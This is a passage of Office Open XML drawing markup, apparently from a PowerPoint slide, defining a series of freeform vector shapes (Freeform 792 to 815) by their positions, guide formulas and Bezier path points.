                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B00E05F-7DC6-4C78-9B66-0CDA7394D481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4297363" y="3489325"/>
              <a:ext cx="98425" cy="131763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7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7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7" name="Freeform 792">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C08B15-3705-4916-93C3-352661E462F5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4549775" y="3516313"/>
              <a:ext cx="88900" cy="104775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4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1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="87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4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0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8" name="Freeform 793">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71516730-F3DB-44D6-AAE4-17DF7A6DA968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4654550" y="3476625"/>
              <a:ext cx="115888" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 250"/>
                <a:gd name="T1" fmla="*/ 159 h 305"/>
                <a:gd name="T2" fmla="*/ 142 w 250"/>
                <a:gd name="T3" fmla="*/ 87 h 305"/>
                <a:gd name="T4" fmla="*/ 77 w 250"/>
                <a:gd name="T5" fmla="*/ 114 h 305"/>
                <a:gd name="T6" fmla="*/ 77 w 250"/>
                <a:gd name="T7" fmla="*/ 21 h 305"/>
                <a:gd name="T8" fmla="*/ 57 w 250"/>
                <a:gd name="T9" fmla="*/ 0 h 305"/>
                <a:gd name="T10" fmla="*/ 21 w 250"/>
                <a:gd name="T11" fmla="*/ 0 h 305"/>
                <a:gd name="T12" fmla="*/ 0 w 250"/>
                <a:gd name="T13" fmla="*/ 16 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 250"/>
                <a:gd name="T15" fmla="*/ 31 h 305"/>
                <a:gd name="T16" fmla="*/ 43 w 250"/>
                <a:gd name="T17" fmla="*/ 31 h 305"/>
                <a:gd name="T18" fmla="*/ 43 w 250"/>
                <a:gd name="T19" fmla="*/ 275 h 305"/>
                <a:gd name="T20" fmla="*/ 21 w 250"/>
                <a:gd name="T21" fmla="*/ 275 h 305"/>
                <a:gd name="T22" fmla="*/ 0 w 250"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 20 w 250"/>
                <a:gd name="T25" fmla="*/ 305 h 305"/>
                <a:gd name="T26" fmla="*/ 100 w 250"/>
                <a:gd name="T27" fmla="*/ 305 h 305"/>
                <a:gd name="T28" fmla="*/ 119 w 250"/>
                <a:gd name="T29" fmla="*/ 290 h 305"/>
                <a:gd name="T30" fmla="*/ 99 w 250"/>
                <a:gd name="T31" fmla="*/ 275 h 305"/>
                <a:gd name="T32" fmla="*/ 77 w 250"/>
                <a:gd name="T33" fmla="*/ 275 h 305"/>
                <a:gd name="T34" fmla="*/ 77 w 250"/>
                <a:gd name="T35" fmla="*/ 186 h 305"/>
                <a:gd name="T36" fmla="*/ 139 w 250"/>
                <a:gd name="T37" fmla="*/ 117 h 305"/>
                <a:gd name="T38" fmla="*/ 173 w 250"/>
                <a:gd name="T39" fmla="*/ 161 h 305"/>
                <a:gd name="T40" fmla="*/ 173 w 250"/>
                <a:gd name="T41" fmla="*/ 275 h 305"/>
                <a:gd name="T42" fmla="*/ 153 w 250"/>
                <a:gd name="T43" fmla="*/ 275 h 305"/>
                <a:gd name="T44" fmla="*/ 133 w 250"/>
                <a:gd name="T45" fmla="*/ 290 h 305"/>
                <a:gd name="T46" fmla="*/ 153 w 250"/>
                <a:gd name="T47" fmla="*/ 305 h 305"/>
                <a:gd name="T48" fmla="*/ 230 w 250"/>
                <a:gd name="T49" fmla="*/ 305 h 305"/>
                <a:gd name="T50" fmla="*/ 250 w 250"/>
                <a:gd name="T51" fmla="*/ 290 h 305"/>
                <a:gd name="T52" fmla="*/ 229 w 250"/>
                <a:gd name="T53" fmla="*/ 275 h 305"/>
                <a:gd name="T54" fmla="*/ 207 w 250"/>
                <a:gd name="T55" fmla="*/ 275 h 305"/>
                <a:gd name="T56" fmla="*/ 207 w 250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07" y="159"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="109"/>
                    <a:pt x="182" y="87"/>
                    <a:pt x="142" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="87"/>
                    <a:pt x="87" y="104"/>
                    <a:pt x="77" y="114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00" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="305"/>
                    <a:pt x="119" y="305"/>
                    <a:pt x="119" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119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5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="275"/>
                    <a:pt x="133" y="275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30" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="305"/>
                    <a:pt x="250" y="305"/>
                    <a:pt x="250" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250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9" name="Freeform 794">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{629B7A28-0CD6-473F-9586-AFDB116716B9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4784725" y="3516313"/>
              <a:ext cx="107950" cy="104775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6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0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3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8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1"/>
                    <a:pt x="68" y="30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8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0" name="Freeform 795">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8351FA8F-3952-49E9-A18F-EC35DCD5796D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4900613" y="3516313"/>
              <a:ext cx="103188" cy="10318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1" name="Freeform 796">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B4E01E8-5802-4E93-ACDB-CF8E832F0FC2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5148263" y="3497263"/>
              <a:ext cx="88900" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 194"/>
                <a:gd name="T1" fmla="*/ 134 h 215"/>
                <a:gd name="T2" fmla="*/ 159 w 194"/>
                <a:gd name="T3" fmla="*/ 162 h 215"/>
                <a:gd name="T4" fmla="*/ 177 w 194"/>
                <a:gd name="T5" fmla="*/ 170 h 215"/>
                <a:gd name="T6" fmla="*/ 194 w 194"/>
                <a:gd name="T7" fmla="*/ 153 h 215"/>
                <a:gd name="T8" fmla="*/ 187 w 194"/>
                <a:gd name="T9" fmla="*/ 140 h 215"/>
                <a:gd name="T10" fmla="*/ 127 w 194"/>
                <a:gd name="T11" fmla="*/ 108 h 215"/>
                <a:gd name="T12" fmla="*/ 181 w 194"/>
                <a:gd name="T13" fmla="*/ 78 h 215"/>
                <a:gd name="T14" fmla="*/ 194 w 194"/>
                <a:gd name="T15" fmla="*/ 62 h 215"/>
                <a:gd name="T16" fmla="*/ 174 w 194"/>
                <a:gd name="T17" fmla="*/ 46 h 215"/>
                <a:gd name="T18" fmla="*/ 112 w 194"/>
                <a:gd name="T19" fmla="*/ 81 h 215"/>
                <a:gd name="T20" fmla="*/ 114 w 194"/>
                <a:gd name="T21" fmla="*/ 21 h 215"/>
                <a:gd name="T22" fmla="*/ 97 w 194"/>
                <a:gd name="T23" fmla="*/ 0 h 215"/>
                <a:gd name="T24" fmla="*/ 81 w 194"/>
                <a:gd name="T25" fmla="*/ 21 h 215"/>
                <a:gd name="T26" fmla="*/ 82 w 194"/>
                <a:gd name="T27" fmla="*/ 81 h 215"/>
                <a:gd name="T28" fmla="*/ 28 w 194"/>
                <a:gd name="T29" fmla="*/ 50 h 215"/>
                <a:gd name="T30" fmla="*/ 17 w 194"/>
                <a:gd name="T31" fmla="*/ 46 h 215"/>
                <a:gd name="T32" fmla="*/ 0 w 194"/>
                <a:gd name="T33" fmla="*/ 62 h 215"/>
                <a:gd name="T34" fmla="*/ 12 w 194"/>
                <a:gd name="T35" fmla="*/ 78 h 215"/>
                <a:gd name="T36" fmla="*/ 67 w 194"/>
                <a:gd name="T37" fmla="*/ 107 h 215"/>
                <a:gd name="T38" fmla="*/ 13 w 194"/>
                <a:gd name="T39" fmla="*/ 137 h 215"/>
                <a:gd name="T40" fmla="*/ 0 w 194"/>
                <a:gd name="T41" fmla="*/ 153 h 215"/>
                <a:gd name="T42" fmla="*/ 20 w 194"/>
                <a:gd name="T43" fmla="*/ 170 h 215"/>
                <a:gd name="T44" fmla="*/ 82 w 194"/>
                <a:gd name="T45" fmla="*/ 134 h 215"/>
                <a:gd name="T46" fmla="*/ 81 w 194"/>
                <a:gd name="T47" fmla="*/ 194 h 215"/>
                <a:gd name="T48" fmla="*/ 97 w 194"/>
                <a:gd name="T49" fmla="*/ 215 h 215"/>
                <a:gd name="T50" fmla="*/ 114 w 194"/>
                <a:gd name="T51" fmla="*/ 194 h 215"/>
                <a:gd name="T52" fmla="*/ 112 w 194"/>
                <a:gd name="T53" fmla="*/ 13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15">
                  <a:moveTo>
                    <a:pt x="112" y="134"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="151"/>
                    <a:pt x="124" y="141"/>
                    <a:pt x="159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4" y="161"/>
                    <a:pt x="194" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="145"/>
                    <a:pt x="188" y="140"/>
                    <a:pt x="187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4" y="71"/>
                    <a:pt x="194" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="60"/>
                    <a:pt x="194" y="46"/>
                    <a:pt x="174" y="46"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="81"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="69"/>
                    <a:pt x="114" y="36"/>
                    <a:pt x="114" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="17"/>
                    <a:pt x="114" y="0"/>
                    <a:pt x="97" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="0"/>
                    <a:pt x="81" y="17"/>
                    <a:pt x="81" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="36"/>
                    <a:pt x="81" y="69"/>
                    <a:pt x="82" y="81"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28" y="50"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="46"/>
                    <a:pt x="20" y="46"/>
                    <a:pt x="17" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="46"/>
                    <a:pt x="0" y="55"/>
                    <a:pt x="0" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="71"/>
                    <a:pt x="6" y="74"/>
                    <a:pt x="12" y="78"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="67" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7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1" y="180"/>
                    <a:pt x="81" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="199"/>
                    <a:pt x="81" y="215"/>
                    <a:pt x="97" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="215"/>
                    <a:pt x="114" y="199"/>
                    <a:pt x="114" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="180"/>
                    <a:pt x="113" y="147"/>
                    <a:pt x="112" y="1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2" name="Freeform 797">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04DEF744-1B5A-45B5-B719-A680FF8D2DD0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262563" y="3475038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9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3 w 197"/>
                <a:gd name="T13" fmla="*/ 31 h 308"/>
                <a:gd name="T14" fmla="*/ 175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0 w 197"/>
                <a:gd name="T27" fmla="*/ 109 h 308"/>
                <a:gd name="T28" fmla="*/ 20 w 197"/>
                <a:gd name="T29" fmla="*/ 123 h 308"/>
                <a:gd name="T30" fmla="*/ 71 w 197"/>
                <a:gd name="T31" fmla="*/ 123 h 308"/>
                <a:gd name="T32" fmla="*/ 71 w 197"/>
                <a:gd name="T33" fmla="*/ 278 h 308"/>
                <a:gd name="T34" fmla="*/ 20 w 197"/>
                <a:gd name="T35" fmla="*/ 278 h 308"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 293 h 308"/>
                <a:gd name="T38" fmla="*/ 20 w 197"/>
                <a:gd name="T39" fmla="*/ 308 h 308"/>
                <a:gd name="T40" fmla="*/ 155 w 197"/>
                <a:gd name="T41" fmla="*/ 308 h 308"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 293 h 308"/>
                <a:gd name="T44" fmla="*/ 155 w 197"/>
                <a:gd name="T45" fmla="*/ 278 h 308"/>
                <a:gd name="T46" fmla="*/ 105 w 197"/>
                <a:gd name="T47" fmla="*/ 278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9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0" y="93"/>
                    <a:pt x="0" y="109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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20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5" y="278"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="278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3" name="Freeform 798">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B79DF7-AB28-4485-954C-D832C8FBE80F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5386388" y="3516313"/>
              <a:ext cx="93663" cy="1047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4" name="Freeform 799">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2F3A998-A34D-494D-BE38-3FA1A61BC6B2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5500688" y="3516313"/>
              <a:ext cx="104775" cy="103188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5" name="Freeform 800">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8052D651-4F65-4092-B487-73F482F29FAC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5613400" y="3516313"/>
              <a:ext cx="119063" cy="103188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3 h 218"/>
                <a:gd name="T10" fmla="*/ 29 w 260"/>
                <a:gd name="T11" fmla="*/ 188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8 h 218"/>
                <a:gd name="T22" fmla="*/ 57 w 260"/>
                <a:gd name="T23" fmla="*/ 98 h 218"/>
                <a:gd name="T24" fmla="*/ 98 w 260"/>
                <a:gd name="T25" fmla="*/ 30 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 260"/>
                <a:gd name="T27" fmla="*/ 71 h 218"/>
                <a:gd name="T28" fmla="*/ 116 w 260"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 260"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 115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8 h 218"/>
                <a:gd name="T40" fmla="*/ 144 w 260"/>
                <a:gd name="T41" fmla="*/ 98 h 218"/>
                <a:gd name="T42" fmla="*/ 185 w 260"/>
                <a:gd name="T43" fmla="*/ 30 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 260"/>
                <a:gd name="T45" fmla="*/ 71 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 260"/>
                <a:gd name="T47" fmla="*/ 188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8 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 260"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 187 w 260"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 138 w 260"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 100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0"/>
                    <a:pt x="98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7" y="188"/>
                    <a:pt x="94" y="188"/>
                    <a:pt x="94" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="218"/>
                    <a:pt x="108" y="218"/>
                    <a:pt x="115" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="160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5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2" y="7"/>
                    <a:pt x="138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6" name="Freeform 801">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61A79A42-A37F-4434-B6CC-A373C12E75F3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5746750" y="3516313"/>
              <a:ext cx="107950" cy="104775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6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0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3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1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8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1"/>
                    <a:pt x="68" y="30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8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1" y="183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7" name="Freeform 802">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18CDE7BE-894E-43CD-A5B0-76F1AE67CB35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5859463" y="3489325"/>
              <a:ext cx="98425" cy="131763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7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7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8" name="Freeform 803">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46E2BB16-46E0-458B-B3D2-976FE71BB09B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6015038" y="3590925"/>
              <a:ext cx="38100" cy="60325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50 h 131"/>
                <a:gd name="T10" fmla="*/ 41 w 83"/>
                <a:gd name="T11" fmla="*/ 0 h 131"/>
                <a:gd name="T12" fmla="*/ 10 w 83"/>
                <a:gd name="T13" fmla="*/ 31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4"/>
                    <a:pt x="83" y="50"/>
                  </a:cubicBez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9" name="Freeform 804">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{457EAA3D-2BFB-40B8-8010-F0B4415A8175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6261100" y="3590925"/>
              <a:ext cx="28575" cy="2857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0" name="Freeform 805">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8997FAF9-F7A2-4EBE-8C0F-8C85C651CB0F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6380163" y="3590925"/>
              <a:ext cx="30163" cy="28575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1" name="Freeform 806">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{537BE5E9-BD2F-4126-AE6E-943FFD077A3B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6500813" y="3590925"/>
              <a:ext cx="28575" cy="2857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2" name="Freeform 807">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F646EDB9-17BC-4C95-B7DA-4E552D9FD67F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6596063" y="3457575"/>
              <a:ext cx="60325" cy="180975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 131 w 131"/>
                <a:gd name="T1" fmla="*/ 193 h 387"/>
                <a:gd name="T2" fmla="*/ 91 w 131"/>
                <a:gd name="T3" fmla="*/ 64 h 387"/>
                <a:gd name="T4" fmla="*/ 15 w 131"/>
                <a:gd name="T5" fmla="*/ 0 h 387"/>
                <a:gd name="T6" fmla="*/ 0 w 131"/>
                <a:gd name="T7" fmla="*/ 14 h 387"/>
                <a:gd name="T8" fmla="*/ 8 w 131"/>
                <a:gd name="T9" fmla="*/ 26 h 387"/>
                <a:gd name="T10" fmla="*/ 97 w 131"/>
                <a:gd name="T11" fmla="*/ 193 h 387"/>
                <a:gd name="T12" fmla="*/ 11 w 131"/>
                <a:gd name="T13" fmla="*/ 358 h 387"/>
                <a:gd name="T14" fmla="*/ 0 w 131"/>
                <a:gd name="T15" fmla="*/ 373 h 387"/>
                <a:gd name="T16" fmla="*/ 15 w 131"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 131 w 131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193"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="134"/>
                    <a:pt x="108" y="89"/>
                    <a:pt x="91" y="64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89" y="81"/>
                    <a:pt x="97" y="161"/>
                    <a:pt x="97" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="243"/>
                    <a:pt x="78" y="313"/>
                    <a:pt x="11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1" y="321"/>
                    <a:pt x="131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3" name="Freeform 808">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02649DB3-EE68-4644-BEBE-A56F47460537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6737350" y="3517900"/>
              <a:ext cx="33338" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 75"/>
                <a:gd name="T1" fmla="*/ 31 h 284"/>
                <a:gd name="T2" fmla="*/ 41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2 w 75"/>
                <a:gd name="T9" fmla="*/ 31 h 284"/>
                <a:gd name="T10" fmla="*/ 43 w 75"/>
                <a:gd name="T11" fmla="*/ 215 h 284"/>
                <a:gd name="T12" fmla="*/ 10 w 75"/>
                <a:gd name="T13" fmla="*/ 255 h 284"/>
                <a:gd name="T14" fmla="*/ 0 w 75"/>
                <a:gd name="T15" fmla="*/ 268 h 284"/>
                <a:gd name="T16" fmla="*/ 16 w 75"/>
                <a:gd name="T17" fmla="*/ 284 h 284"/>
                <a:gd name="T18" fmla="*/ 75 w 75"/>
                <a:gd name="T19" fmla="*/ 202 h 284"/>
                <a:gd name="T20" fmla="*/ 41 w 75"/>
                <a:gd name="T21" fmla="*/ 153 h 284"/>
                <a:gd name="T22" fmla="*/ 10 w 75"/>
                <a:gd name="T23" fmla="*/ 184 h 284"/>
                <a:gd name="T24" fmla="*/ 43 w 75"/>
                <a:gd name="T25" fmla="*/ 21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2" y="31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3" y="0"/>
                    <a:pt x="10" y="16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2" y="47"/>
                    <a:pt x="72" y="31"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="43" y="215"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="242"/>
                    <a:pt x="18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2"/>
                  </a:cubicBez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4" name="Freeform 809">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF541513-6B43-48FF-8573-694D501ABFD1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704850" y="3756025"/>
              <a:ext cx="87313" cy="144463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0 w 188"/>
                <a:gd name="T15" fmla="*/ 274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7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5" name="Freeform 810">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B8180FE-4750-4C6A-A6D8-6939D3732C1B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09625" y="3797300"/>
              <a:ext cx="114300" cy="103188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 249"/>
                <a:gd name="T1" fmla="*/ 26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19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19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7 h 218"/>
                <a:gd name="T48" fmla="*/ 206 w 249"/>
                <a:gd name="T49" fmla="*/ 187 h 218"/>
                <a:gd name="T50" fmla="*/ 206 w 249"/>
                <a:gd name="T51" fmla="*/ 72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6" y="187"/>
                    <a:pt x="228" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="206" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206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6" name="Freeform 811">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F4D91FD-7054-492D-9D8E-6FFCA6A300B9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933450" y="3770313"/>
              <a:ext cx="96838" cy="130175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199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19 w 211"/>
                <a:gd name="T23" fmla="*/ 91 h 279"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 91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3 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213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199" y="91"/>
                    <a:pt x="199" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199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19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3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7" name="Freeform 812">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01E08E07-43D2-4E9E-B642-6D8150F218AD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1176338" y="3756025"/>
              <a:ext cx="107950" cy="144463"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 161 w 237"/>
                <a:gd name="T1" fmla="*/ 280 h 308"/>
                <a:gd name="T2" fmla="*/ 181 w 237"/>
                <a:gd name="T3" fmla="*/ 305 h 308"/>
                <a:gd name="T4" fmla="*/ 217 w 237"/>
                <a:gd name="T5" fmla="*/ 305 h 308"/>
                <a:gd name="T6" fmla="*/ 237 w 237"/>
                <a:gd name="T7" fmla="*/ 289 h 308"/>
                <a:gd name="T8" fmla="*/ 217 w 237"/>
                <a:gd name="T9" fmla="*/ 274 h 308"/>
                <a:gd name="T10" fmla="*/ 195 w 237"/>
                <a:gd name="T11" fmla="*/ 274 h 308"/>
                <a:gd name="T12" fmla="*/ 195 w 237"/>
                <a:gd name="T13" fmla="*/ 21 h 308"/>
                <a:gd name="T14" fmla="*/ 175 w 237"/>
                <a:gd name="T15" fmla="*/ 0 h 308"/>
                <a:gd name="T16" fmla="*/ 139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1 w 237"/>
                <a:gd name="T23" fmla="*/ 31 h 308"/>
                <a:gd name="T24" fmla="*/ 161 w 237"/>
                <a:gd name="T25" fmla="*/ 109 h 308"/>
                <a:gd name="T26" fmla="*/ 102 w 237"/>
                <a:gd name="T27" fmla="*/ 87 h 308"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 198 h 308"/>
                <a:gd name="T30" fmla="*/ 98 w 237"/>
                <a:gd name="T31" fmla="*/ 308 h 308"/>
                <a:gd name="T32" fmla="*/ 161 w 237"/>
                <a:gd name="T33" fmla="*/ 280 h 308"/>
                <a:gd name="T34" fmla="*/ 161 w 237"/>
                <a:gd name="T35" fmla="*/ 173 h 308"/>
                <a:gd name="T36" fmla="*/ 161 w 237"/>
                <a:gd name="T37" fmla="*/ 208 h 308"/>
                <a:gd name="T38" fmla="*/ 100 w 237"/>
                <a:gd name="T39" fmla="*/ 277 h 308"/>
                <a:gd name="T40" fmla="*/ 34 w 237"/>
                <a:gd name="T41" fmla="*/ 198 h 308"/>
                <a:gd name="T42" fmla="*/ 104 w 237"/>
                <a:gd name="T43" fmla="*/ 117 h 308"/>
                <a:gd name="T44" fmla="*/ 161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1" y="280"/>
                  </a:move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7"/>
                    <a:pt x="100" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="277"/>
                    <a:pt x="34" y="242"/>
                    <a:pt x="34" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="150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8" name="Freeform 813">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D53C420D-D11D-4A26-A2CA-BEC36BF680A1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1290638" y="3797300"/>
              <a:ext cx="109538" cy="153988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0 h 329"/>
                <a:gd name="T4" fmla="*/ 203 w 237"/>
                <a:gd name="T5" fmla="*/ 110 h 329"/>
                <a:gd name="T6" fmla="*/ 133 w 237"/>
                <a:gd name="T7" fmla="*/ 190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5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4 h 329"/>
                <a:gd name="T22" fmla="*/ 56 w 237"/>
                <a:gd name="T23" fmla="*/ 3 h 329"/>
                <a:gd name="T24" fmla="*/ 20 w 237"/>
                <a:gd name="T25" fmla="*/ 3 h 329"/>
                <a:gd name="T26" fmla="*/ 0 w 237"/>
                <a:gd name="T27" fmla="*/ 18 h 329"/>
                <a:gd name="T28" fmla="*/ 20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5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="216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9" name="Freeform 814">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A0C8FC8-94F5-4F49-B252-EEA1A55AEA85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1416050" y="3797300"/>
              <a:ext cx="103188" cy="10318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0" name="Freeform 815">
              <a:extLst>
